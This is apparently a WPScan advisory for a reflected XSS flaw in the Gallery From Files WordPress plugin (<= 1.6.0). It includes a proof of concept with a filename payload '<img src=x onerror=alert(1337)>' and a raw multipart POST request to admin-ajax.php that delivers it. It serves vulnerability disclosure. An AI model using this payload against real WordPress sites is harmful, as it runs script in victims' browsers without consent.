WordPress Plugin Vulnerabilities
Gallery From Files <= 1.6.0 - Reflected Cross-Site Scripting (XSS)
Description
This plugin gives us the functionality of uploading images to the server. But filenames are not properly sanitized before being output in an error message when they have an invalid extension, leading to a reflected Cross-Site Scripting issue. Due to the lack of CSRF check, the attack could also be performed via such vector.
Proof of Concept
Steps : 1. Rename any file to <img src=x onerror=alert(1337)> 2. Choose this file to upload and click on the button ( upload selected file ) 3. When a file is uploading you will find that an alert box popped on-screen having content "1337" POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------245018834521283925753967681812 Content-Length: 506 Cookies: [any user or even unauthenticated] Connection: close -----------------------------245018834521283925753967681812 Content-Disposition: form-data; name="myfile[]"; filename="<img src onerror=alert(2)>" Content-Type: image/png -----------------------------245018834521283925753967681812 Content-Disposition: form-data; name="action" gallery_from_files_595_fileupload -----------------------------245018834521283925753967681812 Content-Disposition: form-data; name="filesName" myfile -----------------------------245018834521283925753967681812--
Affects Plugins
No known fix References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Satyender Yadav
Submitter
Satyender Yadav
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-26 (about 2 years ago)
Added
2021-05-26 (about 2 years ago)
Last Updated
2021-05-26 (about 2 years ago)
WPScan 